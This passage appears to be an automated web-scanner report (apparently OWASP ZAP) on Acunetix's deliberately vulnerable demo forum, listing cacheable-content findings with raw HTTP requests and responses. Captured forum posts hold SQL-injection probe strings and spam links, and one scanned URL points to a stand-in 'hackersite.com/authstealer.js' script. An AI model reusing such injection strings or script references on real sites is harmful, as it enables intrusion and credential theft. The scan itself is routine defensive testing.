forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 328 |
| Solution |
The content may be marked as storable by ensuring that the following conditions are satisfied:
The request method must be understood by the cache and defined as being cacheable ("GET", "HEAD", and "POST" are currently defined as cacheable)
The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)
The "no-store" cache directive must not appear in the request or response header fields
For caching by "shared" caches such as "proxy" caches, the "private" response directive must not appear in the response
For caching by "shared" caches such as "proxy" caches, the "Authorization" header field must not appear in the request, unless the response explicitly allows it (using one of the "must-revalidate", "public", or "s-maxage" Cache-Control response directives)
In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:
It must contain an "Expires" header field
It must contain a "max-age" response directive
For "shared" caches such as "proxy" caches, it must contain a "s-maxage" response directive
It must contain a "Cache Control Extension" that allows it to be cached
It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
|
| Reference |
https://tools.ietf.org/html/rfc7234
https://tools.ietf.org/html/rfc7231 http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html (obsoleted by rfc7234) |
| Tags | WSTG-v42-ATHN-06 |
| CWE Id | 524 |
| WASC Id | 13 |
| Plugin Id | 10049 |
|
Informational |
Storable and Cacheable Content |
|---|---|
| Description |
The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where "shared" caching servers such as "proxy" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.
|
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 338 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 950 |
| Response Body - size: 950 bytes. |
GIF89addæÿÿÿá
